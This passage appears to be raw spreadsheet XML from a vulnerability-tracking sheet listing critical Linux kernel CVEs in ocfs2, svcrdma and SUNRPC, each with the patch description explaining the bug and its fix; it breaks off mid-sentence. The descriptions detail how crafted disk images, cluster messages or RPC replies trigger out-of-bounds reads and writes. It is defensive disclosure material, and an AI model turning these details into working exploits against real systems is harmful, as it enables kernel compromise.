      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate directory-index entry counts when reading metadata
ocfs2_validate_dx_leaf() and ocfs2_validate_dx_root() check the ECC and
signature of an indexed-directory block before it reaches higher-level
callers, but neither validator bounds the ocfs2_dx_entry_list counts
against the capacity of the block that holds them.
ocfs2_dx_dir_search() then walks
	for (i = 0; i &lt; le16_to_cpu(entry_list-&gt;de_num_used); i++)
		dx_entry = &amp;entry_list-&gt;de_entries[i];
over de_num_used entries with no bounds check.  entry_list is either
dx_leaf-&gt;dl_list (from ocfs2_read_dx_leaf) or, for an inline root,
dx_root-&gt;dr_entries.  A crafted on-disk image can set de_num_used (and
de_count, which is the __counted_by_le() bound of de_entries) to 0xffff
and make the walk read far past the end of the 4KB metadata block, giving
a slab out-of-bounds read reachable from any path lookup, stat() or open()
on an indexed directory once the image is mounted.
Commit 775c17386a6f ("ocfs2: validate dx_root extent list fields during
block read") already bounds dr_list for the non-inline dx_root, but left
the inline dr_entries path and the dx_leaf dl_list unchecked.  Add the
same read-time validation for both entry lists: de_count must equal the
capacity of the block (ocfs2_dx_entries_per_leaf()/per_root()) and
de_num_used must not exceed de_count, rejecting corrupted metadata with
-EFSCORRUPTED before ocfs2_dx_dir_search() can walk an out-of-range entry
array.
de_count is always written as exactly the block capacity when a leaf or
inline root is formatted, so the equality check does not reject any valid
image.
Found by 0sec automated security-research tooling (https://0sec.ai).</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89492</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89494</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate lengths in dlm_mig_lockres_handler
A node receiving a DLM_MIG_LOCKRES message trusts several fields of the
peer-supplied dlm_migratable_lockres without validation.  num_locks and
lockname_len are bounded only on the sending side, and the message is
never checked to actually carry num_locks migratable_lock entries.  As a
result dlm_process_recovery_data() walks mres-&gt;ml[0..num_locks) past the
kmalloc(data_len) copy of the message (an out-of-bounds read that ends in
a BUG_ON panic), and dlm_init_lockres() copies lockname_len bytes into the
fixed 32-byte o2dlm_lockname slab object (a heap out-of-bounds write). 
Both are reachable by any node in the domain.
Validate these fields right after dlm_grab(), before anything uses them --
including the not-joined error path, which already prints mres-&gt;lockname
with the unbounded lockname_len as a %.*s precision.  Reject the message
unless lockname_len &lt;= DLM_LOCKID_NAME_MAX, num_locks &lt;=
DLM_MAX_MIGRATABLE_LOCKS (the bound the sender already asserts), and the
payload is large enough to hold the claimed locks.  Conforming recovery
and migration messages are unaffected.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89494</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89495</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: bound namelen in dlm_migrate_request_handler
Patch series "ocfs2/dlm: bound peer-controlled lengths in the o2dlm".
The o2dlm receive handlers trust u8 length and count fields from the wire
without bounding them, so a node in a DLM domain can corrupt or panic any
other node with a malformed message.  Three defects:
  - dlm_migrate_request_handler() passes migrate-&gt;namelen unchecked to
    dlm_init_mle(), which memcpy()s it into the 32-byte mname[] of an
    o2dlm_mle slab object: a heap out-of-bounds write of up to ~215
    attacker-controlled bytes.
  - dlm_mig_lockres_handler() passes mres-&gt;lockname_len unchecked to
    dlm_init_lockres(), which memcpy()s it into the 32-byte o2dlm_lockname
    slab object: a heap out-of-bounds write of up to ~223 bytes.
  - the same handler trusts mres-&gt;num_locks without checking that the
    message is large enough to hold that many entries, so
    dlm_process_recovery_data() walks mres-&gt;ml[] past the kmalloc(data_len)
    copy and trips a BUG_ON (an out-of-bounds read ending in a panic).
The other o2dlm receive handlers already reject an oversized name; the
migration and recovery handlers have omitted it since the DLM was added
(see the Fixes tags).  Patch 1 bounds namelen; patch 2 validates
lockname_len, num_locks, and the payload size.  Conforming recovery and
migration traffic is unaffected.
o2net authenticates peers only by the DLM domain key, so any node that has
joined the domain -- including a compromised or malicious member -- can
send these messages.  There is no local trigger; the attacker must already
be a member of the cluster.
Each sink was confirmed under KASAN with an out-of-tree module mirroring
it exactly -- a kmem_cache/kmalloc of the real destination size, then the
same unclamped memcpy/loop: slab-out-of-bounds Write for the two writes,
Read for the recovery walk, and a panic.  A userspace AddressSanitizer
build faults identically under -m32 and -m64.  Scrubbed logs are available
on request.
I reported this privately to security@kernel.org and the ocfs2 maintainers
on 2026-06-20; with no response after the standard embargo period I am
posting the fix publicly.  I have no embargo requirement.
This patch (of 2):
A node receiving a DLM_MIGRATE_REQUEST message trusts the peer-supplied
name length (migrate-&gt;namelen) without bounding it.  dlm_init_mle() then
copies that many bytes into the fixed DLM_LOCKID_NAME_MAX-byte mname[]
array of an o2dlm_mle slab object, so a malformed message from a cluster
peer overflows the slab object by up to ~215 bytes: a heap out-of-bounds
write of attacker-controlled data, reachable by any node in the domain.
Reject an oversized name, the way dlm_master_request_handler() and the
other o2dlm receive handlers already do; the migration handler omits the
check entirely.  Conforming messages are unaffected.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89495</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89526</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Validate Read chunk positions before reconstruction
The RPC/RDMA Read chunk position field is supplied by the remote
client and stored verbatim in the parsed chunk list.
xdr_count_read_segments() checks only 4-byte alignment; it never
compares the position against the received inline body length.
In the single-chunk path, svc_rdma_read_complete_one() splits the
head and tail kvecs at ch_position. A position past the inline
body underflows the tail length, exposing adjacent slab memory to
the upper XDR decoder.
In the multi-chunk path, svc_rdma_read_multiple_chunks() computes
gap lengths between chunks as unsigned subtractions from
ch_position. Overlapping Read chunks cause these subtractions to
underflow. A final position past the inline body likewise
underflows the trailing gap length. svc_rdma_copy_inline_range()
then copies past the receive buffer into request pages that are
returned to the client through the Reply channel.
Bound inline-range copies in svc_rdma_copy_inline_range() against
the decoded inline RPC body saved in rc_saved_arg. Reject a
single Read chunk positioned beyond that body, and reject
multi-chunk lists where accumulated read bytes exceed the next
chunk's position. Apply the same position and overlap checks in
the call-chunk interleaving path.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89526</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89530</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reject inline replies that overflow the pull-up buffer
An RPC-over-RDMA client can request a reply, such as an NFS READ
payload, without providing a Write list or a Reply chunk to carry
it. When such a reply needs more scatter/gather entries than the
device's Send Queue supports, svc_rdma_pull_up_needed() selects
pull-up and svc_rdma_pull_up_reply_msg() linearizes the whole
reply into sctxt-&gt;sc_xprt_buf. That buffer is only sc_max_req_size
bytes, while the reply on this path is bounded only by the client's
request, so svc_rdma_xb_linearize() copies past the end of the
buffer and corrupts adjacent slab memory. The oversized length is
then stored in sc_sges[0].length and posted, so the device also
reads beyond the mapped region.
The SGE-exhaustion branch is the only pull-up path that can exceed
the buffer: the threshold branch pulls up only replies smaller
than RPCRDMA_PULLUP_THRESH, and replies that fit the device's SGE
budget are sent directly without linearization. Make
svc_rdma_pull_up_needed() report -E2BIG when the reply it would
pull up cannot fit sc_max_req_size, and fail the request with
ERR_CHUNK as RFC 8166 Section 4.5.3 directs rather than dropping
the connection.
The helper no longer answers a simple yes/no question: it now
reports pull-up, no pull-up, or -E2BIG for a reply too large to
linearize. Rename svc_rdma_pull_up_needed() to
svc_rdma_check_pull_up() so its name no longer implies a boolean
predicate.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89530</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89533</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Fix offset arithmetic in read_chunk_range
svc_rdma_read_chunk_range() walks a Read chunk's segment list to
build a sub-range starting at byte offset and spanning length bytes
for a Position-Zero or Call chunk. Two arithmetic defects in the
per-segment loop produce wrong DMA lengths and a u32 underflow:
    pcl_for_each_segment(segment, chunk) {
            if (offset &gt; segment-&gt;rs_length) {
                    offset -= segment-&gt;rs_length;
                    continue;
            }
            dummy.rs_handle = segment-&gt;rs_handle;
            dummy.rs_length = min_t(u32, length,
                                    segment-&gt;rs_length) - offset;
            dummy.rs_offset = segment-&gt;rs_offset + offset;
First, the skip predicate uses '&gt;' instead of '&gt;='. When offset
equals the segment's full rs_length, the segment is fully consumed
and should be skipped, but the loop falls through into the body.
The resulting dummy.rs_length is min_t(u32, length, rs_length) -
rs_length, which underflows to a near-UINT_MAX u32 when length is
smaller than rs_length, or is zero otherwise.
Second, the length formula subtracts offset from the min_t() result
rather than from segment-&gt;rs_length before the cap. For offset &gt; 0
the segment's residual is rs_length - offset, not rs_length, so the
cap must be applied to the residual. With the current bracketing,
whenever length is smaller than rs_length - offset the per-segment
length becomes length - offset instead of length, silently dropping
offset bytes from the rebuilt chunk. Combined with the boundary
case above it also enables the u32 underflow path, which propagates
a huge nr_bvec into svc_rdma_build_read_segment() and a multi-MiB
kmalloc_array_node() in svc_rdma_get_rw_ctxt().
Additionally, svc_rdma_read_call_chunk() can invoke this function
with length == 0 when the last Read chunk ends exactly at the end
of the Call chunk. With the corrected &gt;= predicate, every segment
is skipped and the function returns the initial -EINVAL, rejecting
a valid request. Return success immediately when length is zero.
Also break out of the loop once length is fully consumed to avoid
passing zero-length segments to svc_rdma_build_read_segment().
Fix by using '&gt;=' so a fully-consumed segment is skipped, by
moving '- offset' inside min_t() so the cap is applied to the
segment's residual length, by returning success for zero-length
requests, and by stopping iteration when the requested range has
been consumed.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89533</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89536</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: wait for in-flight client TLS handshake callback
xs_tls_handshake_sync() gives xs_tls_handshake_done() a reference to the
lower transport before submitting the handshake request. On timeout or
signal, the synchronous waiter drops that reference after calling
tls_handshake_cancel().
handshake_req_cancel() returns false when handshake_complete() has
already marked the request complete. In that case the completion callback
can still be running, so dropping the callback-owned reference in the
waiter can free the lower transport before xs_tls_handshake_done() stores
xprt_err or drops its own reference.
If cancellation loses to completion, wait until xs_tls_handshake_done()
signals handshake_done and let the callback release its reference. This
mirrors the server-side handshake lifetime handling and keeps the timeout
or signal return value unchanged.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89536</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89538</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Reject krb5 v2 wrap tokens with oversized ec field
gss_krb5_unwrap_v2() sets buf-&gt;len to a logical
length, which can be much smaller than head[0].iov_len
(the allocated receive-page capacity).  It then calls
xdr_buf_trim() with a trim length derived from the 16-bit
"extra count" (ec) field in the Kerberos v2 token header.
The ec field is authenticated by the post-decrypt memcmp()
against the encrypted header copy, so a randomly-mutated
value is rejected.  However, any peer holding a valid GSS
context can legitimately encrypt a token whose ec exceeds
the plaintext length.  Per RFC 4121, such a token is
structurally malformed.
Although xdr_buf_trim() now clamps the buf-&gt;len subtraction
to avoid unsigned underflow, the buffer is still left in a
semantically invalid state (zero length, inconsistent iov
lengths) when ec is oversized.
Reject these tokens before calling xdr_buf_trim(), giving
callers a well-defined GSS_S_DEFECTIVE_TOKEN error and
keeping the xdr_buf internally consistent.  The wrapped blob
begins at a nonzero offset -- both callers pass len as
offset + opaque_len -- so buf-&gt;len still counts the offset
bytes that precede the blob.  Compare the trim length
against the remaining wrapped segment, buf-&gt;len - offset,
rather than the whole buffer; comparing against buf-&gt;len
alone leaves an offset-wide window in which an oversized ec
passes the test and xdr_buf_trim() cuts into the bytes ahead
of the blob.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89538</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89541</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: harden gss_unwrap_resp_priv length checks
gss_unwrap_resp_priv() validates the RPCSEC_GSS opaque length with
    offset = (u8 *)(p) - (u8 *)head-&gt;iov_base;
    if (offset + opaque_len &gt; rcv_buf-&gt;len)
            goto unwrap_failed;
    maj_stat = gss_unwrap(ctx-&gt;gc_gss_ctx, offset,
                          offset + opaque_len, rcv_buf);
Both operands are u32 and the sum is computed in u32. A reply with
opaque_len near 0xffffffff makes offset + opaque_len wrap to a small
value that is below rcv_buf-&gt;len, so the bound check passes and
gss_unwrap() is called with end &lt; begin. The check also lacks a
lower bound, so any opaque_len in [0, GSS_KRB5_TOK_HDR_LEN) is
accepted and forwarded to gss_krb5_unwrap_v2(), whose pre-decrypt
header reads at ptr+4 and ptr+6 then run past the token.
A krb5p NFS server returning a crafted RPCSEC_GSS reply can drive
the client into out-of-bounds reads in gss_krb5_unwrap_v2() and the
rotate_left() loop that follows.
Fix by replacing the single combined check with three guards that
are safe in u32 arithmetic and that enforce the RFC 4121 minimum
outer token length:
    if (offset &gt; rcv_buf-&gt;len)
            goto unwrap_failed;
    if (opaque_len &gt; rcv_buf-&gt;len - offset)
            goto unwrap_failed;
    if (opaque_len &lt; GSS_KRB5_TOK_HDR_LEN)
            goto unwrap_failed;
The first guard makes the subtraction in the second guard
unconditionally safe; offset is derived from a successful
xdr_inline_decode() in the head kvec, so in practice it already
satisfies the bound. The floor mirrors the server-side check added
in commit 5b757c2e57a5 ("SUNRPC: svcauth_gss: enforce krb5 token
minimum length").</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89541</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89542</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: harden gss_krb5_unwrap_v2 against short tokens
gss_krb5_unwrap_v2() reads the EC and RRC header fields at ptr+4 and
ptr+6 before validating that the token is at least GSS_KRB5_TOK_HDR_LEN
(16) bytes long, and its rotate_left() helper passes buf-&gt;len - base
to xdr_buf_subsegment() without verifying that base &lt;= buf-&gt;len. When
a caller hands in a sub-16-byte token, or a token whose declared len
leaves base past the end of the buffer, three distinct failures follow:
    gss_krb5_unwrap_v2(offset, len, buf)
      ptr = buf-&gt;head[0].iov_base + offset
      ec  = *(ptr + 4)              /* OOB read on short head */
      rrc = *(ptr + 6)              /* OOB read on short head */
      rotate_left(offset + 16, buf, rrc)
        xdr_buf_subsegment(buf, &amp;subbuf,
                           base, buf-&gt;len - base)   /* u32 wrap when base &gt; len */
        _rotate_left(&amp;subbuf, shift)
          shift %= buf-&gt;len         /* divide-by-zero when base == len */
After decryption, the cleanup arithmetic has the same shape:
    movelen = min_t(unsigned int, buf-&gt;head[0].iov_len, len);
    movelen -= offset + GSS_KRB5_TOK_HDR_LEN + headskip;
    BUG_ON(offset + GSS_KRB5_TOK_HDR_LEN + headskip + movelen &gt;
                                            buf-&gt;head[0].iov_len);
The BUG_ON re-adds the value just subtracted, so it reduces to
min(A, B) &gt; A and is permanently false; it cannot catch the unsigned
underflow of movelen, which then drives a ~UINT_MAX-byte memmove().
Add four defense-in-depth guards inside the unwrap core so it is safe
regardless of what its callers validate:
  - reject tokens with len - offset &lt; GSS_KRB5_TOK_HDR_LEN before
    touching ptr+4/ptr+6;
  - bail from rotate_left() when buf-&gt;len &lt;= base, covering both the
    underflow and zero-length cases;
  - return early from _rotate_left() when buf-&gt;len is zero, so the
    shift %= buf-&gt;len modulo cannot fault;
  - replace the dead BUG_ON with a live check that returns
    GSS_S_DEFECTIVE_TOKEN before the movelen subtraction.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89542</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89546</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: close backchannel before destroying callback service
A backchannel receive can complete a request while the NFS callback
service is being torn down.  xprt_complete_bc_request() removes the
request from bc_pa_list, drops bc_alloc_count, marks the request in use,
and then asks xprt_enqueue_bc_request() to hand it to the callback
service.
If teardown has already cleared xprt-&gt;bc_serv, xprt_enqueue_bc_request()
currently returns without enqueueing or freeing the committed request.
The xprt_get() taken on entry is leaked as well.  If the producer wins
the race before bc_serv is cleared, it can also enqueue onto sv_cb_list
after nfs_callback_down() has stopped the callback threads, leaving the
request linked to a svc_serv that is about to be freed.
Close the producer side before callback threads are stopped.  Add
xprt_svc_shutdown_bc() to clear xprt-&gt;bc_serv under bc_pa_lock, and call
it on callback shutdown and callback-start failure before stopping the
